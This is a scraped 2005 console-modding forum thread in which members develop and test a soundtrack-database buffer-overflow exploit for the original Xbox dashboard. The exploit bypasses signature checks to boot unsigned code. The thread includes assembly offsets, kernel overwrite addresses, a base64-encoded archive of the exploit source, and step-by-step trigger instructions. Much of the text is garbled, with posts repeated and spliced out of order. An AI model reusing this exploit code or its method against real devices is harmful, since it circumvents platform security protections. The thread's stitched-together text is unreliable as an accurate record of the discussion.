;;; 3) Change the MS public key in kernel to habibi-key.
;;; 4) Return to Dashboard. <<<<<<<<<<
then the Return to Dashboard would then triger the probe in the 4920 dash...;;; 2) Read a replacement hack from the end of ST.DB and write it to the
;;; beginning.
;;; 3) Change the MS public key in kernel to habibi-key.
;;; 4) Return to Dashboard. <<<<<<<<<<
but the (double)st.db still works coldboot>ProbeEnabledUberDash just no file write
as of yet, no file write...
can someone try to get it to write a file (any setup) ?
Post by: dumdasme on October 06, 2005, 04:17:00 PM
QUOTE
Sorry for the double post, but it wouldn't let me edit. I also tested this on an ntsc 4920 with generic fonts and it works. If anyone is interested in my final file setup look here
oops, I meant my ntsc 3944.
@cio- On the 5838 i can't use the settings_adoc.xip xbe because that has been fixed in this kernel. So instead, on both xboxes, i used the st.db to trigger the default.xbe in E\.
I'm not sure if how i have it setup i can access my live console or not, i don't use live so i can't really test it. Since I have the dualboot setup, can i access the live console or do i need to boot straight into the uber4920 dash's xboxdash.xbe?
Post by: krayzie on October 06, 2005, 10:28:00 PM
QUOTE(dumdasme @ Oct 7 2005, 12:28 AM)
oops, I meant my ntsc 3944.
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Cio on October 07, 2005, 01:10:00 AM
-
Post by: Cio on October 07, 2005, 01:10:00 AM
QUOTE(kingroach @ Oct 6 2005, 03:00 PM)
use a mime encoder..
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: PedrosPad on October 07, 2005, 02:24:00 AM
-
Post by: PedrosPad on October 07, 2005, 02:24:00 AM
QUOTE(Cio @ Oct 7 2005, 09:21 AM)
Could you elaborate just a little further...
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Cio on October 07, 2005, 02:32:00 AM
-
I never did do 5 and 6, thx! (that explains alot)
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: dumdasme on October 07, 2005, 11:57:00 AM
-
disregard my last post, it seems i've gotten a little mixed up in a couple of areas. I misread something that said the st.db got fixed in the latest dashboards and somehow twisted that into my previous post.
so if i understand this right, this means how i have it setup is basically no different from the regular ndure setup. I was trying to figure out how my setup would give you live console access whereas the regular ndure setup wouldn't. So basically what I need is 5960 xboxdash.xbe-> <<Eggsbox>> -> uberdash4920 -> st.db.
So at this point, it is basically not possible to dualboot and mantain full live console access?
At least I can say that you can successfully use the st.db with the 5838 kernel which was the original reason for me posting.
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Ndure protagonist on October 08, 2005, 10:13:00 AM
-
dumdasme, thanks for confirming xman954's new version of the 4920 audio exploit works with the UberDash on a 5838! (Although expecting it would, technically, it's great to know for certain that it really does.)
If you have enough space left, you could add the 'settings3' and 'settings_panel' XIP's (just for shits'n'giggles) to enable its [Settings]->[System Info.] ... hardly anyone has ever seen it display K:5838 and D:4920 before.
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: xman954 on October 08, 2005, 02:40:00 PM
-
STILL trying to find the offset but no luck so far,
did a stack dump (112 bytes) from coldboot and eggsbox boot
there are a few differences..
does any know of a app or xbe that will show FREE memory that will coldboot??
and anyone care to guess how large the offset would be ??
(ie: 10KB <offset < 50KB )
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: dumdasme on October 08, 2005, 05:35:00 PM
-
I'm totally confused now. I adjusted my setup, so now i load the 5960 dash, easter egg to load the 4920 dash, but then when i try to do the st.db, then it reboots the xbox back to the 5960 dash. But if I start out loading straight to the 4920 dash or do the ndure dualboot to the 4920 dash then I can do the st.db trick fine.
Any ideas of why this is happening?
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: kingroach on October 08, 2005, 08:19:00 PM
-
in my 5101 xbox I am having another problem.. I modified the st.db slighly ( just edited the path /partition1\bios\).. first time I enter EEE, it returns me back to msdash.. then at msdash when I enter ee again, it just reboots the xbox..
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: globe_guyx on October 09, 2005, 11:14:00 AM
-
Yippeee rmenhal!!!! Together with xman954 the possiblities are endless
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: xman954 on October 09, 2005, 11:40:00 AM
-
WOW that was it !!!
and ST.DB (udstdb) works fine with 4034 too.....
for some reason i was stuck thinking the offset would be plus
but know it would be small
NP (eh..) will be happy too
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: krayzie on October 09, 2005, 12:58:00 PM
-
Whoohah. Rmenhal in tha hizouse. Nice to see your name across the screen with again some outstanding info.
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: dumdasme on October 09, 2005, 02:10:00 PM
-
Nice work rmenhal! this fixed the problem I was having with my 5838.
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: PedrosPad on October 09, 2005, 03:16:00 PM
-
Post by: Cio on October 07, 2005, 02:32:00 AM
Post by: dumdasme on October 07, 2005, 11:57:00 AM
so if i understand this right, this means how i have it setup is basically no different from the regular ndure setup. I was trying to figure out how my setup would give you live console access whereas the regular ndure setup wouldn't. So basically what I need is 5960 xboxdash.xbe-> <<Eggsbox>> -> uberdash4920 -> st.db.
So at this point, it is basically not possible to dualboot and mantain full live console access?
At least I can say that you can successfully use the st.db with the 5838 kernel which was the original reason for me posting.
Post by: Ndure protagonist on October 08, 2005, 10:13:00 AM
If you have enough space left, you could add the 'settings3' and 'settings_panel' XIP's (just for shits'n'giggles) to enable its [Settings]->[System Info.] ... hardly anyone has ever seen it display K:5838 and D:4920 before.
Post by: xman954 on October 08, 2005, 02:40:00 PM
did a stack dump (112 bytes) from coldboot and eggsbox boot
there are a few differences..
does any know of a app or xbe that will show FREE memory that will coldboot??
and anyone care to guess how large the offset would be ??
(ie: 10KB <offset < 50KB )
Post by: dumdasme on October 08, 2005, 05:35:00 PM
Any ideas of why this is happening?
Post by: kingroach on October 08, 2005, 08:19:00 PM
Post by: globe_guyx on October 09, 2005, 11:14:00 AM
Post by: xman954 on October 09, 2005, 11:40:00 AM
CODE
D5960_offset equ 00001B000h ; eggsBox
mem_offset equ 0D004B694h - D5960_offset ; adrress when launched from 5960>EggsBox>4920
mem_offset equ 0D004B694h - D5960_offset ; adrress when launched from 5960>EggsBox>4920
and ST.DB (udstdb) works fine with 4034 too.....
for some reason i was stuck thinking the offset would be plus
but know it would be small
NP (eh..) will be happy too
Post by: krayzie on October 09, 2005, 12:58:00 PM
Post by: dumdasme on October 09, 2005, 02:10:00 PM
Post by: PedrosPad on October 09, 2005, 03:16:00 PM
QUOTE(rmenhal @ Oct 9 2005, 06:00 PM)
Decided to take a peek here after a long time.
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: kingroach on October 09, 2005, 03:24:00 PM
-
.. so I assume it will work on all other kernels too.. it works in my 5101.. only MS can give us three exploitable .xbe in one dash..lol
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: eh. on October 09, 2005, 11:22:00 PM
-
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Cio on October 10, 2005, 05:59:00 AM
-
GJ
Xbox: What happen?
HD: Somebody set up us the exploit.
Kernel: We get signal.
Xbox: What!
Kernel: Main screen turn on.
Xbox: It's you!!
xman954: How are you gentlemen!!
rmenhal: All your box are belong to us.
xman954: You are on the way to homebrew.
Xbox: What you say!!
rmenhal: You have no chance to check sig's make your time.
rmenhal & xman954: Ha Ha Ha Ha ....
P.S. nice to see you again eh
(please excuse the rant, you all got me in a good mood on monday, not something that happens alot).
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: dus on October 10, 2005, 10:52:00 AM
-
Ahh, of course! Now that makes sense. I wondered what all those fs:[20h]+250h and calls all over
the code were doing.
Yes, that would be more elegant, but hardly necessary and may not even be possible.
Thanks for clearing that up! (It has been nagging at me for a while now.)
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: kingroach on October 11, 2005, 08:22:00 AM
-
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: xman954 on October 11, 2005, 09:23:00 AM
-
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Horscht on October 11, 2005, 11:45:00 AM
-
ok, a few ?s about this ST.DB exploit.
1. I have problems getting the right 4920 uberdash. Slayers 2.5 comes with a 4920, but that's not the uberdash one. So, NP linked to a thread that has PPF files (I got them already) to convert the non uberdash from slayers 2.5 to the uberdash one. Do these patches create me a real working uberdash that I can actualy use?
2. The ST.DB that rmenhal posted, what habibi signed xbe does it load?
thanks in advance
Horscht
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: xman954 on October 11, 2005, 12:03:00 PM
-
thanks to rmenhal it works fine, 3944.4034 so far..
http://forums.xbox-s...dpost&p=2973832
just put the offset in D5960_offset, 1B000h
and change the + to - in the next line, there is the 'generic'
both boot E:\default.xbe
slayers2.5 MSdash is all that you need + PPF patch
to get everything working
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: dus on October 11, 2005, 03:21:00 PM
-
Checked it and it works fine. (On a 5101 box using PBL to load Evox M8 bios, don't ask...)
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Horscht on October 12, 2005, 11:11:00 AM
-
unfortunatelly, this can't be used without problems on krazie's Ndure installer. krazie's ndure doesn't come with smaller fillers, but a rather big shadowC.img. So krazie's ndure setup lacks the free space for this setup. Just thought I'd mention it.
Krayzie: maybe you should consider a slightly smaller shadowC.img on the next version of your installer and add a few smaller filler files. Just a suggestion, tho
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: krayzie on October 12, 2005, 11:28:00 AM
-
I'm sure that when you are smart enough to figure this stuff out your also capable of playing with the shadow C a little like removing it and add a smaller one...
If this makes it to the next installer I ofcourse take care of all necesarry adjustments.
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Horscht on October 12, 2005, 11:40:00 AM
-
yeah, I just tried it (I didn't have any problems making myself a smaller shadowc.img, I was just mentioning it for the next version of your installer ), and it works fine. I had problems at first, because I forgot to habibi sign the UnleashX default.xbe . I almost got pissed until I realized that. It works very good on my 5838 kernel. Thanks rmenhal and xman for your work.
What I'll do next, is to use the xbe shortcutmaker (there is one by the avalaunch team, I thnik), to create a shortcut xbe to the gamesave. I will put the shortcut (habibi signed this time
) into the root of E named default.xbe, and the gamesave should load.
all in all: thanks for all your work rmenhal and xman.
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Textbook on October 13, 2005, 09:37:00 PM
-
I haven't read this thread since the day it was made, and I don't have anything to offer, so I just read through it tonight for an update. I just wanted to say wow! It really says something when you can (re)introduce an idea and it can be made into a success in just a few days. It shows a lot about the knowledge, intelligence, and determination of the people of Xbox-Scene. (especially xman954 and rmenhal)
As I don't know much about this as you guys do, I think I have the following correct. The UDDAE exploit works like SCEEE does for UXE. Except this works with NDURE (which is even better). Basically, this can completely turn the sofmod on and off. I'm going to try and get this correct, but please correct me if I'm wrong and if I do get it wrong, sorry about trashing the thread and creating more confusion.
1. The normal, retail MS Dash (5960) would load.
2. Trigger the EEE by doing the <<Eggsbox>> thing.
3. This would launch the uberdash (4920)
4. You would load a retail CD and then go to copy, copy, a, a, a. ?? ( I have no idea)
5. This would launch a habibi xbe ??
How does Ndure work with this? Man, I must sound stupid, as I don't know much about the development side of anything.
Also, would this work like the SCEEE , where it would be turned on and off via a EEE Switcher? Or would it boot up to the normal 5960 everytime?
Congratulations on the great accomplishment you guys.
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: krayzie on October 13, 2005, 10:24:00 PM
-
Post by: kingroach on October 09, 2005, 03:24:00 PM
.. so I assume it will work on all other kernels too.. it works in my 5101.. only MS can give us three exploitable .xbe in one dash..lol
Post by: eh. on October 09, 2005, 11:22:00 PM
QUOTE(xman954 @ Oct 9 2005, 11:51 AM)
NP (eh..) will be happy too
Ecstatic; the generic UDDAE st.db (with 00001B000h D5960_offset) works on my box, as does the kernel specific eh! 
Post by: Cio on October 10, 2005, 05:59:00 AM
GJXbox: What happen?
HD: Somebody set up us the exploit.
Kernel: We get signal.
Xbox: What!
Kernel: Main screen turn on.
Xbox: It's you!!
xman954: How are you gentlemen!!
rmenhal: All your box are belong to us.
xman954: You are on the way to homebrew.
Xbox: What you say!!
rmenhal: You have no chance to check sig's make your time.
rmenhal & xman954: Ha Ha Ha Ha ....
P.S. nice to see you again eh
(please excuse the rant, you all got me in a good mood on monday, not something that happens alot).
Post by: dus on October 10, 2005, 10:52:00 AM
QUOTE(rmenhal @ Oct 10 2005, 06:27 PM)
That just stands for 'overwritten address', it's not any technical acronym. Those addresses
locate the pointer to a structure used by the XDK debugger (I think - I don't have the XDK.)
locate the pointer to a structure used by the XDK debugger (I think - I don't have the XDK.)
Ahh, of course! Now that makes sense. I wondered what all those fs:[20h]+250h and calls all over
the code were doing.
QUOTE(rmenhal @ Oct 10 2005, 06:27 PM)
Perhaps there is a writable function pointer in a fixed location somewhere in the
XBE (instead of the kernel), with a call close enough to the overwrite position, but I didn't
look for one. The exploit could be made kernel version independent with that.
XBE (instead of the kernel), with a call close enough to the overwrite position, but I didn't
look for one. The exploit could be made kernel version independent with that.
Yes, that would be more elegant, but hardly necessary and may not even be possible.
Thanks for clearing that up! (It has been nagging at me for a while now.)
Post by: kingroach on October 11, 2005, 08:22:00 AM
Post by: xman954 on October 11, 2005, 09:23:00 AM
CODE
%elifdef MS_4627_01
OWA equ 80035C04h+250h; MS 4627.01
from the hulk st.db
OWA equ 80035C04h+250h; MS 4627.01
Post by: Horscht on October 11, 2005, 11:45:00 AM
1. I have problems getting the right 4920 uberdash. Slayers 2.5 comes with a 4920, but that's not the uberdash one. So, NP linked to a thread that has PPF files (I got them already) to convert the non uberdash from slayers 2.5 to the uberdash one. Do these patches create me a real working uberdash that I can actualy use?
2. The ST.DB that rmenhal posted, what habibi signed xbe does it load?
thanks in advance
Horscht
Post by: xman954 on October 11, 2005, 12:03:00 PM
http://forums.xbox-s...dpost&p=2973832
just put the offset in D5960_offset, 1B000h
and change the + to - in the next line, there is the 'generic'
both boot E:\default.xbe
slayers2.5 MSdash is all that you need + PPF patch
to get everything working
Post by: dus on October 11, 2005, 03:21:00 PM
QUOTE(dus @ Oct 11 2005, 10:19 PM)
...I guess the kernel _specific_ ST.DB posted by rmenhal should work on a normal 4920 dash.
Checked it and it works fine. (On a 5101 box using PBL to load Evox M8 bios, don't ask...)
Post by: Horscht on October 12, 2005, 11:11:00 AM
Krayzie: maybe you should consider a slightly smaller shadowC.img on the next version of your installer and add a few smaller filler files. Just a suggestion, tho
Post by: krayzie on October 12, 2005, 11:28:00 AM
If this makes it to the next installer I ofcourse take care of all necesarry adjustments.
Post by: Horscht on October 12, 2005, 11:40:00 AM
), and it works fine. I had problems at first, because I forgot to habibi sign the UnleashX default.xbe . I almost got pissed until I realized that. It works very good on my 5838 kernel. Thanks rmenhal and xman for your work.What I'll do next, is to use the xbe shortcutmaker (there is one by the avalaunch team, I thnik), to create a shortcut xbe to the gamesave. I will put the shortcut (habibi signed this time
) into the root of E named default.xbe, and the gamesave should load.all in all: thanks for all your work rmenhal and xman.
Post by: Textbook on October 13, 2005, 09:37:00 PM
As I don't know much about this as you guys do, I think I have the following correct. The UDDAE exploit works like SCEEE does for UXE. Except this works with NDURE (which is even better). Basically, this can completely turn the sofmod on and off. I'm going to try and get this correct, but please correct me if I'm wrong and if I do get it wrong, sorry about trashing the thread and creating more confusion.
1. The normal, retail MS Dash (5960) would load.
2. Trigger the EEE by doing the <<Eggsbox>> thing.
3. This would launch the uberdash (4920)
4. You would load a retail CD and then go to copy, copy, a, a, a. ?? ( I have no idea)
5. This would launch a habibi xbe ??
How does Ndure work with this? Man, I must sound stupid, as I don't know much about the development side of anything.
Also, would this work like the SCEEE , where it would be turned on and off via a EEE Switcher? Or would it boot up to the normal 5960 everytime?
Congratulations on the great accomplishment you guys.
Post by: krayzie on October 13, 2005, 10:24:00 PM
QUOTE(Textbook @ Oct 14 2005, 05:48 AM)
I haven't read this thread since the day it was made, and I don't have anything to offer, so I just read through it tonight for an update. I just wanted to say wow! It really says something when you can (re)introduce an idea and it can be made into a success in just a few days. It shows a lot about the knowledge, intelligence, and determination of the people of Xbox-Scene. (especially xman954 and rmenhal)
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Horscht on October 13, 2005, 10:57:00 PM
-
Post by: Horscht on October 13, 2005, 10:57:00 PM
QUOTE(krayzie @ Oct 14 2005, 06:35 AM)
Also you don't need an audio cd to launch the audio exploit. (at least I asume this is the no cd version. I haven't tried it myself yet.)
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: xman954 on October 13, 2005, 11:52:00 PM
-
it is the no CD version
and there is a blank sound track to copy (in the st.db itself)
no need for any thing else
also too the switcher xbe could rename
a real st.db to use in the modded state ( so you could have in game music)
then when switched off put back the hacked one
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: rgtaa on October 14, 2005, 05:27:00 PM
-
did anyone make a package for this yet?
... and if so can you please just give the correct name for it ... so I can go easter egg hunting in the usual places.
One of my xbox's still has uxe on it because I like the sceee exploit... it would be nice to have this type exploit on my ndure xbox's.
Thanks guys for figureing it all out!
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Ndure protagonist on November 22, 2005, 12:16:00 AM
-
{@ rgtaa: http://forums.xbox-s...dpost&p=3052414 @}
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: kingroach on November 25, 2005, 10:48:00 AM
-
here is the new generic st.db xman emailed to me, includes any path support:
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Ndure protagonist on December 18, 2005, 12:08:00 PM
-
unfortunatelly, this can't be used without problems on krazie's Ndure installer. krazie's ndure doesn't come with smaller fillers, but a rather big shadowC.img. So krazie's ndure setup lacks the free space for this setup. Just thought I'd mention it.
Krayzie: maybe you should consider a slightly smaller shadowC.img on the next version of your installer and add a few smaller filler files. Just a suggestion, tho
{= Actually, UDDAE can be more easily implemented another (safe) way with krazie's Ndure 1.0. I wonder if any one reading this understands the MS dash's setup requirements sufficiently to realize how... =}
It's even easier for Ndure 2.1 users of course; they can now benefit automatically from its 21 MB "future use" filler...
Get kingroach's 3.0 (currently beta; see his sig) and do 'Add Ndure Toolset';
only have that option checked, it's in the UDDAE section, then:
copy the resultant E\ndts folder(&contents) on the PC over to the Xbox's /E/
(if you have existing MS dash soundtracks and want to keep them,
then rename your /E/TDATA/fffe000/music/ST.DB so it remains available)
launch /E/ndts/default.xbe (to start red LED, realC mode)
select 'Install Menu'>'Install UDDAE'
When you restart the Xbox it will behave as before, plus you can now get from the MS dash to the softmod by pressing:
[Music][blank soundtrack][Copy][Select][Copy][New Soundtrack]
<<Eggs|3ox>> (that's two '<' Symbols, Shift E, g, g, s, beta Accent '|3', o, x and two '>' Symbols)
[Done](uberdash starts)[Music][blank soundtrack][Copy][Copy][New Soundtrack][Done]
-
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Ndure protagonist on December 22, 2005, 10:05:00 AM
-
For example, the previous post's steps could alternatively be performed (with no adverse consequences) after deleting these 21 MB consuming files from /C/Audio/AmbientAudio:
Non kingroach Ndure users would need to launch a different XBE via the ST.DB though...
&}
Post by: xman954 on October 13, 2005, 11:52:00 PM
and there is a blank sound track to copy (in the st.db itself)
no need for any thing else
also too the switcher xbe could rename
a real st.db to use in the modded state ( so you could have in game music)
then when switched off put back the hacked one
Post by: rgtaa on October 14, 2005, 05:27:00 PM
... and if so can you please just give the correct name for it ... so I can go easter egg hunting in the usual places.
One of my xbox's still has uxe on it because I like the sceee exploit... it would be nice to have this type exploit on my ndure xbox's.
Thanks guys for figureing it all out!
Post by: Ndure protagonist on November 22, 2005, 12:16:00 AM
Post by: kingroach on November 25, 2005, 10:48:00 AM
CODE
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
bVBLBQYAAAAAAQABADYAAADOBQAAAAA=
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
bVBLBQYAAAAAAQABADYAAADOBQAAAAA=
Post by: Ndure protagonist on December 18, 2005, 12:08:00 PM
QUOTE(Horscht @ Oct 12 2005, 10:18 AM)
unfortunatelly, this can't be used without problems on krazie's Ndure installer. krazie's ndure doesn't come with smaller fillers, but a rather big shadowC.img. So krazie's ndure setup lacks the free space for this setup. Just thought I'd mention it.
Krayzie: maybe you should consider a slightly smaller shadowC.img on the next version of your installer and add a few smaller filler files. Just a suggestion, tho
It's even easier for Ndure 2.1 users of course; they can now benefit automatically from its 21 MB "future use" filler...
Get kingroach's 3.0 (currently beta; see his sig) and do 'Add Ndure Toolset';
only have that option checked, it's in the UDDAE section, then:
copy the resultant E\ndts folder(&contents) on the PC over to the Xbox's /E/
(if you have existing MS dash soundtracks and want to keep them,
then rename your /E/TDATA/fffe000/music/ST.DB so it remains available)
launch /E/ndts/default.xbe (to start red LED, realC mode)
select 'Install Menu'>'Install UDDAE'
When you restart the Xbox it will behave as before, plus you can now get from the MS dash to the softmod by pressing:
[Music][blank soundtrack][Copy][Select][Copy][New Soundtrack]
<<Eggs|3ox>> (that's two '<' Symbols, Shift E, g, g, s, beta Accent '|3', o, x and two '>' Symbols)
[Done](uberdash starts)[Music][blank soundtrack][Copy][Copy][New Soundtrack][Done]
Post by: Ndure protagonist on December 22, 2005, 10:05:00 AM
QUOTE(Ndure protagonist @ Dec 18 2005, 12:15 PM)
{= Actually, UDDAE can be more easily implemented another (safe) way with krazie's Ndure 1.0. I wonder if any one reading this understands the MS dash's setup requirements sufficiently to realize how... =}
{= The Audio folders/files can be replaced by others that consume their space... =}For example, the previous post's steps could alternatively be performed (with no adverse consequences) after deleting these 21 MB consuming files from /C/Audio/AmbientAudio:
CODE
AMB_05_ENGINEROOM_LR.wav
AMB_06_COMMUNICATION_LR.wav
AMB_12_HYDROTHUNDER_LR.wav
AMB_EC_Steam1.wav
AMB_EC_Steam2.wav
AMB_EC_Steam4.wav
AMB_EC_Steam5.wav
AMB_EC_Steam6.wav
AMB_EC_Steam7.wav
{&AMB_06_COMMUNICATION_LR.wav
AMB_12_HYDROTHUNDER_LR.wav
AMB_EC_Steam1.wav
AMB_EC_Steam2.wav
AMB_EC_Steam4.wav
AMB_EC_Steam5.wav
AMB_EC_Steam6.wav
